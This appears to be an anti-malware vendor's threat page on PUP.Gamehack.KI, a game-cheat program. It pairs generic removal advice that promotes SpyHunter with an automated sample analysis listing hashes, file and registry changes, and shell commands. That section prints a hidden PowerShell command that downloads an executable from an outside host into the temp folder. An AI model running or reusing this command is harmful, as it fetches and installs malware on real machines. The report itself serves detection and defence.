PUP.Gamehack.KI
The detection of PUP.Gamehack.KI on your system indicates the presence of a potentially unwanted program (PUP) that may be causing issues with your computer's performance and security. It's essential to understand the nature of this threat and take immediate action to remove it to prevent any further damage.
Table of Contents
What Is PUP.Gamehack.KI?
PUP.Gamehack.KI is a type of potentially unwanted program that may have been installed on your system without your knowledge or consent. PUPs are software applications that may not be malicious in nature but can still cause problems with your computer's performance, stability, and security. They often bundled with other software or downloaded from untrusted sources, and can be difficult to remove without proper tools and techniques.
How PUP.Gamehack.KI Operates
PUPs like PUP.Gamehack.KI typically operate by installing themselves on your system and then running in the background, often without your knowledge or consent. They may collect data about your browsing habits, search history, and other personal information, which can be used for targeted advertising or other malicious purposes. They may also consume system resources, causing your computer to slow down or become unresponsive. In some cases, PUPs can also download and install additional malware or unwanted software, further compromising your system's security.
Symptoms of Infection
If your system is infected with PUP.Gamehack.KI, you may notice a range of symptoms, including slow system performance, unwanted pop-ups and advertisements, and changes to your browser settings or homepage. You may also notice that your system is running slowly or is unresponsive, or that your browser is redirecting you to unwanted websites. In some cases, you may also notice that your system is crashing or freezing frequently, or that you are experiencing other issues with your computer's stability and security.
How to Remove PUP.Gamehack.KI
- Boot your system in Safe Mode with Networking to prevent the PUP from running and to give you a clean environment to work in.
- Download and install a reputable anti-malware tool, such as SpyHunter, and run a full scan of your system to detect and remove any malware or unwanted software.
- Uninstall any suspicious programs or software that you do not recognize or need, as these may be related to the PUP infection.
- Reset your browser settings to their default values, including Chrome, Firefox, and Edge, to remove any changes made by the PUP.
- Reboot your system and run another scan with your anti-malware tool to ensure that the PUP has been completely removed and that your system is clean.
Conclusion
Removing PUP.Gamehack.KI from your system requires a combination of technical knowledge and the right tools. By following the steps outlined above, you can help to ensure that your system is clean and free from malware. It's also essential to take steps to prevent future infections, such as being cautious when downloading software, avoiding untrusted sources, and keeping your operating system and software up to date. By taking these precautions, you can help to protect your system and your personal data from the risks associated with PUPs like PUP.Gamehack.KI.
Analysis Report
General information
| Family Name: | PUP.Gamehack.KI |
|---|---|
| Signature status: | No Signature |
Known Samples
Known Samples
This section lists other file samples believed to be associated with this family.|
MD5:
95f2cb15e5f017c4018e5922556c5e1c
SHA1:
b568219807df4e2edee283e86754ab64d9161534
SHA256:
9EAA2786693424A19BF7A16CF97BB98019E479F1A4BABCA4FAE722437A678C4D
File Size:
537.60 KB, 537600 bytes
|
|
MD5:
035cee2001608233bd8340b5b66dd45e
SHA1:
224f586ff9e5daabc24842632e363207ea5c42fc
SHA256:
9BC59FD2AFF61ABA23C80663FB0A9BBEFBE6065ACBAD12BE7C229836DDB8CD6E
File Size:
708.10 KB, 708096 bytes
|
|
MD5:
9c07845e2084d4e3479e8ecd34c487d8
SHA1:
a92d036a1aff16002bb6d66480fa2c8a479bbc86
SHA256:
3C63C7A05C59A603E1A31D6D6358ED587E8F5C315F5EF7BF8EE8035A2077E955
File Size:
711.17 KB, 711168 bytes
|
|
MD5:
49440fff3cb4105b4bba505afab31626
SHA1:
1d15b30b8f0c33f6b1dfc71589014c993db0155c
SHA256:
DAFB539E49493261D3FEA83492A3C3917B6228116ED927A420DCEED50E46DD91
File Size:
526.85 KB, 526848 bytes
|
Windows Portable Executable Attributes
- File doesn't have "Rich" header
- File doesn't have exports table
- File doesn't have security information
- File has TLS information
- File is 64-bit executable
- File is either console or GUI application
- File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
- File is Native application (NOT .NET application)
- File is not packed
- IMAGE_FILE_DLL is not set inside PE header (Executable)
Show More
- IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)
File Icons
File Icons
This section displays icon resources found within family samples. Malware often replicates icons commonly associated with legitimate software to mislead users into believing the malware is safe.File Traits
- dll
- imgui
- No Version Info
- WriteProcessMemory
- x64
Block Information
Block Information
During analysis, EnigmaSoft breaks file samples into logical blocks for classification and comparison with other samples. Blocks can be used to generate malware detection rules and to group file samples into families based on shared source code, functionality and other distinguishing attributes and characteristics. This section lists a summary of this block data, as well as its classification by EnigmaSoft. A visual representation of the block data is also displayed, where available.| Total Blocks: | 295 |
|---|---|
| Potentially Malicious Blocks: | 50 |
| Whitelisted Blocks: | 239 |
| Unknown Blocks: | 6 |
Visual Map
? - Unknown Block
x - Potentially Malicious Block
Similar Families
Similar Families
This section lists other families that share similarities with this family, based on EnigmaSoft’s analysis. Many malware families are created from the same malware toolkits and use the same packing and encryption techniques but uniquely extend functionality. Similar families may also share source code, attributes, icons, subcomponents, compromised and/or invalid digital signatures, and network characteristics. Researchers leverage these similarities to rapidly and effectively triage file samples and extend malware detection rules.- Gamehack.GSR
- Kryptik.ODFF
- RobloxHack.LE
- RobloxStealer.B
Files Modified
Files Modified
This section lists files that were created, modified, moved and/or deleted by samples in this family. File system activity can provide valuable insight into how malware functions on the operating system.| File | Attributes |
|---|---|
| \device\namedpipe\pshost.134222832962244677.6148.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_0to0bhxn.yoh.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_c1vnpa1w.0oe.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_c5dkfjt2.zjp.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_wmqprstw.hbe.psm1 | Generic Write,Read Attributes |
Registry Modifications
Registry Modifications
This section lists registry keys and values that were created, modified and/or deleted by samples in this family. Windows Registry activity can provide valuable insight into malware functionality. Additionally, malware often creates registry values to allow itself to automatically start and indefinitely persist after an initial infection has compromised the system.| Key::Value | Data | API Name |
|---|---|---|
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | p0����� | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | k���� | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | �e���� | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | ����� | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | uI-��� | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | _7P-��� | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | �-��� | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | �n�-��� | RegNtPreCreateKey |
Windows API Usage
Windows API Usage
This section lists Windows API calls that are used by the samples in this family. Windows API usage analysis is a valuable tool that can help identify malicious activity, such as keylogging, security privilege escalation, data encryption, data exfiltration, interference with antivirus software, and network request manipulation.| Category | API |
|---|---|
| Syscall Use |
Show More
24 additional items are not displayed above. |
| Process Manipulation Evasion |
|
| Anti Debug |
|
| User Data Access |
|
| Process Shell Execute |
|
| Process Terminate |
|
| Encryption Used |
|
| Other Suspicious |
|
Shell Command Execution
Shell Command Execution
This section lists Windows shell commands that are run by the samples in this family. Windows Shell commands are often leveraged by malware for nefarious purposes and can be used to elevate security privileges, download and launch other malware, exploit vulnerabilities, collect and exfiltrate data, and hide malicious activity.
C:\WINDOWS\system32\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=9UHkJuvH1q5iXCdVrZDSW01.txt' -OutFile $env:TEMP\BK288768.exe
|
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=9UHkJuvH1q5iXCdVrZDSW01.txt' -OutFile $env:TEMP\BK288768.exe
|